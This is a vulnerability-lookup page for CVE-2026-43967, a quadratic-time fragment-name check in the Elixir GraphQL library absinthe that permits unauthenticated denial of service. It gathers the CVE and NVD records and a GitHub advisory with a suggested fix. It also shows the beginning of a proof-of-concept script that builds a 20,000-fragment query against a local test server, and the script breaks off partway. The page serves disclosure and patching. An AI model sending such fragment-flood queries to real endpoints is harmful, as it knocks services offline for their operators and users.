Vulnerability-Lookup

CVE-2026-43967 (GCVE-0-2026-43967)

Vulnerability from cvelistv5 – Published: 2026-05-08 15:42 – Updated: 2026-05-09 04:18

Title

Quadratic fragment-name uniqueness check causes denial of service in absinthe

Summary

Inefficient Algorithmic Complexity vulnerability in absinthe-graphql absinthe allows unauthenticated denial of service via quadratic fragment-name uniqueness validation. 'Elixir.Absinthe.Phase.Document.Validation.UniqueFragmentNames':run/2 iterates over all fragments and for each one calls duplicate?/2, which evaluates Enum.count(fragments, &(&1.name == name)) — a full linear scan of the fragment list. The result is O(N²) comparisons per document, where N is the number of fragment definitions supplied by the caller. Because input.fragments is built directly from the GraphQL query body, N is fully attacker-controlled. A minimum-size fragment definition is roughly 16 bytes, so a ~1 MB document carries ~60,000 fragments and forces ~3.6 × 10⁹ comparisons inside this single validation phase. No authentication, schema knowledge, or special configuration is required. This issue affects absinthe: from 1.2.0 before 1.10.2.

Severity

8.7 (High)


                        
                          CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE

CWE-407 - Inefficient Algorithmic Complexity

Assigner

EEF

References

4 references

URL	Tags
https://github.com/absinthe-graphql/absinthe/secu…	vendor-advisoryrelated
https://cna.erlef.org/cves/CVE-2026-43967.html	related
https://osv.dev/vulnerability/EEF-CVE-2026-43967	related
https://github.com/absinthe-graphql/absinthe/comm…	patch

Impacted products

2 products

Vendor	Product	Version
absinthe-graphql	absinthe	Affected: 1.2.0 , < 1.10.2 (semver) cpe:2.3:a:absinthe-graphql:absinthe::::::::
absinthe-graphql	absinthe	Affected: 0b46e3bcc06c0d3797bacd64761b908a84646c1d , < 223600c520493dcaf95080af552c413099f92c9d (git) cpe:2.3:a:absinthe-graphql:absinthe::::::::

Credits

Peter Ullrich Curtis Schiewek

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-43967",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-05-08T16:07:01.053904Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-05-08T16:07:10.322Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "collectionURL": "https://repo.hex.pm",
          "cpes": [
            "cpe:2.3:a:absinthe-graphql:absinthe:*:*:*:*:*:*:*:*"
          ],
          "defaultStatus": "unaffected",
          "modules": [
            "\u0027Elixir.Absinthe.Phase.Document.Validation.UniqueFragmentNames\u0027"
          ],
          "packageName": "absinthe",
          "packageURL": "pkg:hex/absinthe",
          "product": "absinthe",
          "programFiles": [
            "lib/absinthe/phase/document/validation/unique_fragment_names.ex"
          ],
          "programRoutines": [
            {
              "name": "\u0027Elixir.Absinthe.Phase.Document.Validation.UniqueFragmentNames\u0027:run/2"
            },
            {
              "name": "\u0027Elixir.Absinthe.Phase.Document.Validation.UniqueFragmentNames\u0027:duplicate?/2"
            }
          ],
          "repo": "https://github.com/absinthe-graphql/absinthe",
          "vendor": "absinthe-graphql",
          "versions": [
            {
              "lessThan": "1.10.2",
              "status": "affected",
              "version": "1.2.0",
              "versionType": "semver"
            }
          ]
        },
        {
          "collectionURL": "https://github.com",
          "cpes": [
            "cpe:2.3:a:absinthe-graphql:absinthe:*:*:*:*:*:*:*:*"
          ],
          "defaultStatus": "unaffected",
          "modules": [
            "\u0027Elixir.Absinthe.Phase.Document.Validation.UniqueFragmentNames\u0027"
          ],
          "packageName": "absinthe-graphql/absinthe",
          "packageURL": "pkg:github/absinthe-graphql/absinthe",
          "product": "absinthe",
          "programFiles": [
            "lib/absinthe/phase/document/validation/unique_fragment_names.ex"
          ],
          "programRoutines": [
            {
              "name": "\u0027Elixir.Absinthe.Phase.Document.Validation.UniqueFragmentNames\u0027:run/2"
            },
            {
              "name": "\u0027Elixir.Absinthe.Phase.Document.Validation.UniqueFragmentNames\u0027:duplicate?/2"
            }
          ],
          "repo": "https://github.com/absinthe-graphql/absinthe",
          "vendor": "absinthe-graphql",
          "versions": [
            {
              "lessThan": "223600c520493dcaf95080af552c413099f92c9d",
              "status": "affected",
              "version": "0b46e3bcc06c0d3797bacd64761b908a84646c1d",
              "versionType": "git"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:a:absinthe-graphql:absinthe:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "1.10.2",
                  "versionStartIncluding": "1.2.0",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ],
          "operator": "AND"
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "value": "Peter Ullrich"
        },
        {
          "lang": "en",
          "type": "remediation developer",
          "value": "Curtis Schiewek"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "Inefficient Algorithmic Complexity vulnerability in absinthe-graphql absinthe allows unauthenticated denial of service via quadratic fragment-name uniqueness validation.\u003cp\u003e\u003ctt\u003e\u0027Elixir.Absinthe.Phase.Document.Validation.UniqueFragmentNames\u0027:run/2\u003c/tt\u003e iterates over all fragments and for each one calls \u003ctt\u003eduplicate?/2\u003c/tt\u003e, which evaluates \u003ctt\u003eEnum.count(fragments, \u0026amp;(\u0026amp;1.name == name))\u003c/tt\u003e \u2014 a full linear scan of the fragment list. The result is O(N\u00b2) comparisons per document, where N is the number of fragment definitions supplied by the caller.\u003c/p\u003e\u003cp\u003eBecause \u003ctt\u003einput.fragments\u003c/tt\u003e is built directly from the GraphQL query body, N is fully attacker-controlled. A minimum-size fragment definition is roughly 16 bytes, so a ~1 MB document carries ~60,000 fragments and forces ~3.6 \u00d7 10\u2079 comparisons inside this single validation phase. No authentication, schema knowledge, or special configuration is required.\u003c/p\u003e\u003cp\u003eThis issue affects absinthe: from 1.2.0 before 1.10.2.\u003c/p\u003e"
            }
          ],
          "value": "Inefficient Algorithmic Complexity vulnerability in absinthe-graphql absinthe allows unauthenticated denial of service via quadratic fragment-name uniqueness validation.\n\n\u0027Elixir.Absinthe.Phase.Document.Validation.UniqueFragmentNames\u0027:run/2 iterates over all fragments and for each one calls duplicate?/2, which evaluates Enum.count(fragments, \u0026(\u00261.name == name)) \u2014 a full linear scan of the fragment list. The result is O(N\u00b2) comparisons per document, where N is the number of fragment definitions supplied by the caller.\n\nBecause input.fragments is built directly from the GraphQL query body, N is fully attacker-controlled. A minimum-size fragment definition is roughly 16 bytes, so a ~1 MB document carries ~60,000 fragments and forces ~3.6 \u00d7 10\u2079 comparisons inside this single validation phase. No authentication, schema knowledge, or special configuration is required.\n\nThis issue affects absinthe: from 1.2.0 before 1.10.2."
        }
      ],
      "impacts": [
        {
          "capecId": "CAPEC-229",
          "descriptions": [
            {
              "lang": "en",
              "value": "CAPEC-229 Serialized Data Parameter Blowup"
            }
          ]
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "NETWORK",
            "baseScore": 8.7,
            "baseSeverity": "HIGH",
            "privilegesRequired": "NONE",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "userInteraction": "NONE",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
            "version": "4.0",
            "vulnAvailabilityImpact": "HIGH",
            "vulnConfidentialityImpact": "NONE",
            "vulnIntegrityImpact": "NONE"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-407",
              "description": "CWE-407 Inefficient Algorithmic Complexity",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-09T04:18:14.810Z",
        "orgId": "6b3ad84c-e1a6-4bf7-a703-f496b71e49db",
        "shortName": "EEF"
      },
      "references": [
        {
          "tags": [
            "vendor-advisory",
            "related"
          ],
          "url": "https://github.com/absinthe-graphql/absinthe/security/advisories/GHSA-9mhv-8h52-q7q2"
        },
        {
          "tags": [
            "related"
          ],
          "url": "https://cna.erlef.org/cves/CVE-2026-43967.html"
        },
        {
          "tags": [
            "related"
          ],
          "url": "https://osv.dev/vulnerability/EEF-CVE-2026-43967"
        },
        {
          "tags": [
            "patch"
          ],
          "url": "https://github.com/absinthe-graphql/absinthe/commit/223600c520493dcaf95080af552c413099f92c9d"
        }
      ],
      "source": {
        "discovery": "EXTERNAL"
      },
      "title": "Quadratic fragment-name uniqueness check causes denial of service in absinthe",
      "x_generator": {
        "engine": "cvelib 1.8.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "6b3ad84c-e1a6-4bf7-a703-f496b71e49db",
    "assignerShortName": "EEF",
    "cveId": "CVE-2026-43967",
    "datePublished": "2026-05-08T15:42:34.347Z",
    "dateReserved": "2026-05-04T18:23:25.573Z",
    "dateUpdated": "2026-05-09T04:18:14.810Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-43967",
      "date": "2026-05-27",
      "epss": "0.00083",
      "percentile": "0.24039"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-43967\",\"sourceIdentifier\":\"6b3ad84c-e1a6-4bf7-a703-f496b71e49db\",\"published\":\"2026-05-08T16:16:12.910\",\"lastModified\":\"2026-05-13T15:57:03.607\",\"vulnStatus\":\"Undergoing Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Inefficient Algorithmic Complexity vulnerability in absinthe-graphql absinthe allows unauthenticated denial of service via quadratic fragment-name uniqueness validation.\\n\\n\u0027Elixir.Absinthe.Phase.Document.Validation.UniqueFragmentNames\u0027:run/2 iterates over all fragments and for each one calls duplicate?/2, which evaluates Enum.count(fragments, \u0026(\u00261.name == name)) \u2014 a full linear scan of the fragment list. The result is O(N\u00b2) comparisons per document, where N is the number of fragment definitions supplied by the caller.\\n\\nBecause input.fragments is built directly from the GraphQL query body, N is fully attacker-controlled. A minimum-size fragment definition is roughly 16 bytes, so a ~1 MB document carries ~60,000 fragments and forces ~3.6 \u00d7 10\u2079 comparisons inside this single validation phase. No authentication, schema knowledge, or special configuration is required.\\n\\nThis issue affects absinthe: from 1.2.0 before 1.10.2.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"6b3ad84c-e1a6-4bf7-a703-f496b71e49db\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":8.7,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"NONE\",\"vulnIntegrityImpact\":\"NONE\",\"vulnAvailabilityImpact\":\"HIGH\",\"subConfidentialityImpact\":\"NONE\",\"subIntegrityImpact\":\"NONE\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}]},\"weaknesses\":[{\"source\":\"6b3ad84c-e1a6-4bf7-a703-f496b71e49db\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-407\"}]}],\"references\":[{\"url\":\"https://cna.erlef.org/cves/CVE-2026-43967.html\",\"source\":\"6b3ad84c-e1a6-4bf7-a703-f496b71e49db\"},{\"url\":\"https://github.com/absinthe-graphql/absinthe/commit/223600c520493dcaf95080af552c413099f92c9d\",\"source\":\"6b3ad84c-e1a6-4bf7-a703-f496b71e49db\"},{\"url\":\"https://github.com/absinthe-graphql/absinthe/security/advisories/GHSA-9mhv-8h52-q7q2\",\"source\":\"6b3ad84c-e1a6-4bf7-a703-f496b71e49db\"},{\"url\":\"https://osv.dev/vulnerability/EEF-CVE-2026-43967\",\"source\":\"6b3ad84c-e1a6-4bf7-a703-f496b71e49db\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-43967\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-05-08T16:07:01.053904Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-05-08T16:07:06.565Z\"}}], \"cna\": {\"title\": \"Quadratic fragment-name uniqueness check causes denial of service in absinthe\", \"source\": {\"discovery\": \"EXTERNAL\"}, \"credits\": [{\"lang\": \"en\", \"type\": \"finder\", \"value\": \"Peter Ullrich\"}, {\"lang\": \"en\", \"type\": \"remediation developer\", \"value\": \"Curtis Schiewek\"}], \"impacts\": [{\"capecId\": \"CAPEC-229\", \"descriptions\": [{\"lang\": \"en\", \"value\": \"CAPEC-229 Serialized Data Parameter Blowup\"}]}], \"metrics\": [{\"format\": \"CVSS\", \"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 8.7, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"NONE\", \"subIntegrityImpact\": \"NONE\", \"vulnIntegrityImpact\": \"NONE\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"HIGH\", \"subConfidentialityImpact\": \"NONE\", \"vulnConfidentialityImpact\": \"NONE\"}, \"scenarios\": [{\"lang\": \"en\", \"value\": \"GENERAL\"}]}], \"affected\": [{\"cpes\": [\"cpe:2.3:a:absinthe-graphql:absinthe:*:*:*:*:*:*:*:*\"], \"repo\": \"https://github.com/absinthe-graphql/absinthe\", \"vendor\": \"absinthe-graphql\", \"modules\": [\"\u0027Elixir.Absinthe.Phase.Document.Validation.UniqueFragmentNames\u0027\"], \"product\": \"absinthe\", \"versions\": [{\"status\": \"affected\", \"version\": \"1.2.0\", \"lessThan\": \"1.10.2\", \"versionType\": \"semver\"}], \"packageURL\": \"pkg:hex/absinthe\", \"packageName\": \"absinthe\", \"programFiles\": [\"lib/absinthe/phase/document/validation/unique_fragment_names.ex\"], \"collectionURL\": \"https://repo.hex.pm\", \"defaultStatus\": \"unaffected\", \"programRoutines\": [{\"name\": \"\u0027Elixir.Absinthe.Phase.Document.Validation.UniqueFragmentNames\u0027:run/2\"}, {\"name\": \"\u0027Elixir.Absinthe.Phase.Document.Validation.UniqueFragmentNames\u0027:duplicate?/2\"}]}, {\"cpes\": [\"cpe:2.3:a:absinthe-graphql:absinthe:*:*:*:*:*:*:*:*\"], \"repo\": \"https://github.com/absinthe-graphql/absinthe\", \"vendor\": \"absinthe-graphql\", \"modules\": [\"\u0027Elixir.Absinthe.Phase.Document.Validation.UniqueFragmentNames\u0027\"], \"product\": \"absinthe\", \"versions\": [{\"status\": \"affected\", \"version\": \"0b46e3bcc06c0d3797bacd64761b908a84646c1d\", \"lessThan\": \"223600c520493dcaf95080af552c413099f92c9d\", \"versionType\": \"git\"}], \"packageURL\": \"pkg:github/absinthe-graphql/absinthe\", \"packageName\": \"absinthe-graphql/absinthe\", \"programFiles\": [\"lib/absinthe/phase/document/validation/unique_fragment_names.ex\"], \"collectionURL\": \"https://github.com\", \"defaultStatus\": \"unaffected\", \"programRoutines\": [{\"name\": \"\u0027Elixir.Absinthe.Phase.Document.Validation.UniqueFragmentNames\u0027:run/2\"}, {\"name\": \"\u0027Elixir.Absinthe.Phase.Document.Validation.UniqueFragmentNames\u0027:duplicate?/2\"}]}], \"references\": [{\"url\": \"https://github.com/absinthe-graphql/absinthe/security/advisories/GHSA-9mhv-8h52-q7q2\", \"tags\": [\"vendor-advisory\", \"related\"]}, {\"url\": \"https://cna.erlef.org/cves/CVE-2026-43967.html\", \"tags\": [\"related\"]}, {\"url\": \"https://osv.dev/vulnerability/EEF-CVE-2026-43967\", \"tags\": [\"related\"]}, {\"url\": \"https://github.com/absinthe-graphql/absinthe/commit/223600c520493dcaf95080af552c413099f92c9d\", \"tags\": [\"patch\"]}], \"x_generator\": {\"engine\": \"cvelib 1.8.0\"}, \"descriptions\": [{\"lang\": \"en\", \"value\": \"Inefficient Algorithmic Complexity vulnerability in absinthe-graphql absinthe allows unauthenticated denial of service via quadratic fragment-name uniqueness validation.\\n\\n\u0027Elixir.Absinthe.Phase.Document.Validation.UniqueFragmentNames\u0027:run/2 iterates over all fragments and for each one calls duplicate?/2, which evaluates Enum.count(fragments, \u0026(\u00261.name == name)) \\u2014 a full linear scan of the fragment list. The result is O(N\\u00b2) comparisons per document, where N is the number of fragment definitions supplied by the caller.\\n\\nBecause input.fragments is built directly from the GraphQL query body, N is fully attacker-controlled. A minimum-size fragment definition is roughly 16 bytes, so a ~1 MB document carries ~60,000 fragments and forces ~3.6 \\u00d7 10\\u2079 comparisons inside this single validation phase. No authentication, schema knowledge, or special configuration is required.\\n\\nThis issue affects absinthe: from 1.2.0 before 1.10.2.\", \"supportingMedia\": [{\"type\": \"text/html\", \"value\": \"Inefficient Algorithmic Complexity vulnerability in absinthe-graphql absinthe allows unauthenticated denial of service via quadratic fragment-name uniqueness validation.\u003cp\u003e\u003ctt\u003e\u0027Elixir.Absinthe.Phase.Document.Validation.UniqueFragmentNames\u0027:run/2\u003c/tt\u003e iterates over all fragments and for each one calls \u003ctt\u003eduplicate?/2\u003c/tt\u003e, which evaluates \u003ctt\u003eEnum.count(fragments, \u0026amp;(\u0026amp;1.name == name))\u003c/tt\u003e \\u2014 a full linear scan of the fragment list. The result is O(N\\u00b2) comparisons per document, where N is the number of fragment definitions supplied by the caller.\u003c/p\u003e\u003cp\u003eBecause \u003ctt\u003einput.fragments\u003c/tt\u003e is built directly from the GraphQL query body, N is fully attacker-controlled. A minimum-size fragment definition is roughly 16 bytes, so a ~1 MB document carries ~60,000 fragments and forces ~3.6 \\u00d7 10\\u2079 comparisons inside this single validation phase. No authentication, schema knowledge, or special configuration is required.\u003c/p\u003e\u003cp\u003eThis issue affects absinthe: from 1.2.0 before 1.10.2.\u003c/p\u003e\", \"base64\": false}]}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-407\", \"description\": \"CWE-407 Inefficient Algorithmic Complexity\"}]}], \"cpeApplicability\": [{\"nodes\": [{\"negate\": false, \"cpeMatch\": [{\"criteria\": \"cpe:2.3:a:absinthe-graphql:absinthe:*:*:*:*:*:*:*:*\", \"vulnerable\": true, \"versionEndExcluding\": \"1.10.2\", \"versionStartIncluding\": \"1.2.0\"}], \"operator\": \"OR\"}], \"operator\": \"AND\"}], \"providerMetadata\": {\"orgId\": \"6b3ad84c-e1a6-4bf7-a703-f496b71e49db\", \"shortName\": \"EEF\", \"dateUpdated\": \"2026-05-09T04:18:14.810Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-43967\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-05-09T04:18:14.810Z\", \"dateReserved\": \"2026-05-04T18:23:25.573Z\", \"assignerOrgId\": \"6b3ad84c-e1a6-4bf7-a703-f496b71e49db\", \"datePublished\": \"2026-05-08T15:42:34.347Z\", \"assignerShortName\": \"EEF\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-43967

Vulnerability from fkie_nvd - Published: 2026-05-08 16:16 - Updated: 2026-05-13 15:57

Severity

8.7 (High) - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

Summary

References

	URL	Tags
	6b3ad84c-e1a6-4bf7-a703-f496b71e49db	https://cna.erlef.org/cves/CVE-2026-43967.html
	6b3ad84c-e1a6-4bf7-a703-f496b71e49db	https://github.com/absinthe-graphql/absinthe/commit/223600c520493dcaf95080af552c413099f92c9d
	6b3ad84c-e1a6-4bf7-a703-f496b71e49db	https://github.com/absinthe-graphql/absinthe/security/advisories/GHSA-9mhv-8h52-q7q2
	6b3ad84c-e1a6-4bf7-a703-f496b71e49db	https://osv.dev/vulnerability/EEF-CVE-2026-43967

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Inefficient Algorithmic Complexity vulnerability in absinthe-graphql absinthe allows unauthenticated denial of service via quadratic fragment-name uniqueness validation.\n\n\u0027Elixir.Absinthe.Phase.Document.Validation.UniqueFragmentNames\u0027:run/2 iterates over all fragments and for each one calls duplicate?/2, which evaluates Enum.count(fragments, \u0026(\u00261.name == name)) \u2014 a full linear scan of the fragment list. The result is O(N\u00b2) comparisons per document, where N is the number of fragment definitions supplied by the caller.\n\nBecause input.fragments is built directly from the GraphQL query body, N is fully attacker-controlled. A minimum-size fragment definition is roughly 16 bytes, so a ~1 MB document carries ~60,000 fragments and forces ~3.6 \u00d7 10\u2079 comparisons inside this single validation phase. No authentication, schema knowledge, or special configuration is required.\n\nThis issue affects absinthe: from 1.2.0 before 1.10.2."
    }
  ],
  "id": "CVE-2026-43967",
  "lastModified": "2026-05-13T15:57:03.607",
  "metrics": {
    "cvssMetricV40": [
      {
        "cvssData": {
          "Automatable": "NOT_DEFINED",
          "Recovery": "NOT_DEFINED",
          "Safety": "NOT_DEFINED",
          "attackComplexity": "LOW",
          "attackRequirements": "NONE",
          "attackVector": "NETWORK",
          "availabilityRequirement": "NOT_DEFINED",
          "baseScore": 8.7,
          "baseSeverity": "HIGH",
          "confidentialityRequirement": "NOT_DEFINED",
          "exploitMaturity": "NOT_DEFINED",
          "integrityRequirement": "NOT_DEFINED",
          "modifiedAttackComplexity": "NOT_DEFINED",
          "modifiedAttackRequirements": "NOT_DEFINED",
          "modifiedAttackVector": "NOT_DEFINED",
          "modifiedPrivilegesRequired": "NOT_DEFINED",
          "modifiedSubAvailabilityImpact": "NOT_DEFINED",
          "modifiedSubConfidentialityImpact": "NOT_DEFINED",
          "modifiedSubIntegrityImpact": "NOT_DEFINED",
          "modifiedUserInteraction": "NOT_DEFINED",
          "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
          "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
          "modifiedVulnIntegrityImpact": "NOT_DEFINED",
          "privilegesRequired": "NONE",
          "providerUrgency": "NOT_DEFINED",
          "subAvailabilityImpact": "NONE",
          "subConfidentialityImpact": "NONE",
          "subIntegrityImpact": "NONE",
          "userInteraction": "NONE",
          "valueDensity": "NOT_DEFINED",
          "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
          "version": "4.0",
          "vulnAvailabilityImpact": "HIGH",
          "vulnConfidentialityImpact": "NONE",
          "vulnIntegrityImpact": "NONE",
          "vulnerabilityResponseEffort": "NOT_DEFINED"
        },
        "source": "6b3ad84c-e1a6-4bf7-a703-f496b71e49db",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-05-08T16:16:12.910",
  "references": [
    {
      "source": "6b3ad84c-e1a6-4bf7-a703-f496b71e49db",
      "url": "https://cna.erlef.org/cves/CVE-2026-43967.html"
    },
    {
      "source": "6b3ad84c-e1a6-4bf7-a703-f496b71e49db",
      "url": "https://github.com/absinthe-graphql/absinthe/commit/223600c520493dcaf95080af552c413099f92c9d"
    },
    {
      "source": "6b3ad84c-e1a6-4bf7-a703-f496b71e49db",
      "url": "https://github.com/absinthe-graphql/absinthe/security/advisories/GHSA-9mhv-8h52-q7q2"
    },
    {
      "source": "6b3ad84c-e1a6-4bf7-a703-f496b71e49db",
      "url": "https://osv.dev/vulnerability/EEF-CVE-2026-43967"
    }
  ],
  "sourceIdentifier": "6b3ad84c-e1a6-4bf7-a703-f496b71e49db",
  "vulnStatus": "Undergoing Analysis",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-407"
        }
      ],
      "source": "6b3ad84c-e1a6-4bf7-a703-f496b71e49db",
      "type": "Secondary"
    }
  ]
}

GHSA-9MHV-8H52-Q7Q2

Vulnerability from github – Published: 2026-05-14 13:08 – Updated: 2026-05-14 13:08

Summary

Absinthe: Quadratic fragment-name uniqueness check

Details

Summary

An unauthenticated attacker can stall an Absinthe-backed GraphQL endpoint by submitting a query that contains many fragment definitions. The fragment-name uniqueness validation phase is O(N²) in the number of fragments, so a single modestly-sized request burns seconds of CPU per worker, and sustained traffic exhausts the worker pool (denial of service).

Introduced like with https://github.com/absinthe-graphql/absinthe/commit/0b46e3bcc06c0d3797bacd64761b908a84646c1d#diff-e540120c6a98cc1013be110d08e9d029511b9aabd26ad5f7f643c36834caac14

Details

Absinthe.Phase.Document.Validation.UniqueFragmentNames (lib/absinthe/phase/document/validation/unique_fragment_names.ex:14-40) walks every fragment in input.fragments via run/2, calling process/2 on each one. process/2 then calls duplicate?/2, which evaluates Enum.count(fragments, fn f -> f.name == name end) — a full linear scan of the fragment list — for every individual fragment. The result is N · N name comparisons per document.

input.fragments is built directly from the GraphQL query text the caller sends at the head of the pipeline, so N is attacker-controlled. A minimum-size fragment definition (fragment a on T{f}) is roughly 16 bytes, so a ~1 MB document carries ~60 000 fragments and forces ~3.6 × 10⁹ comparisons inside this one phase. Phoenix's default 8 MB body limit allows substantially larger blow-ups if operators have not lowered it. Nothing in this module caps N.

The fix is to aggregate names once per call rather than re-scanning per fragment, e.g.:

dups =
  for {name, k} <- Enum.frequencies_by(input.fragments, & &1.name),
      k > 1,
      into: MapSet.new(),
      do: name

and then check MapSet.member?(dups, fragment.name) inside process/2. That collapses the phase to O(N).

PoC

A standalone script that builds a GraphQL document with a large number of minimal fragment definitions, feeds it through Absinthe's pipeline, and times the UniqueFragmentNames phase is attached at the end of this report. Running it shows the validation time growing quadratically with the fragment count.

Impact

Algorithmic complexity / denial-of-service. Any service that exposes an Absinthe GraphQL endpoint to untrusted callers is affected: a single unauthenticated POST containing many fragment definitions pins a worker process for seconds, and modest sustained traffic exhausts the request-handling pool. No authentication, schema knowledge, or special configuration is required — only the ability to send a GraphQL query large enough to contain many fragments, which is permitted by Phoenix's default body-size limit.

Scripts and Logs

# Verifies: Quadratic fragment-name uniqueness check

Mix.install([
  {:absinthe, "~> 1.7"},
  {:absinthe_plug, "~> 1.5"},
  {:bandit, "~> 1.0"},
  {:plug, "~> 1.15"},
  {:jason, "~> 1.4"},
  {:req, "~> 0.5"}
])

defmodule VictimSchema do
  use Absinthe.Schema

  object :thing do
    field :f, :string
  end

  query do
    field :thing, :thing do
      resolve(fn _, _ -> {:ok, %{f: "x"}} end)
    end
  end
end

defmodule VictimRouter do
  use Plug.Router

  plug :match

  plug Plug.Parsers,
    parsers: [:json],
    pass: ["*/*"],
    json_decoder: Jason

  plug :dispatch

  forward "/graphql",
    to: Absinthe.Plug,
    init_opts: [schema: VictimSchema]

  match _ do
    send_resp(conn, 404, "nope")
  end
end

port = 47817
{:ok, _} = Bandit.start_link(plug: VictimRouter, port: port)

n = 20_000

fragments =
  1..n
  |> Enum.map(fn i -> "fragment f#{i} on Thing{f}" end)
  |> Enum.join(" ")

query = "{ thing { f } } " <> fragments

IO.puts(
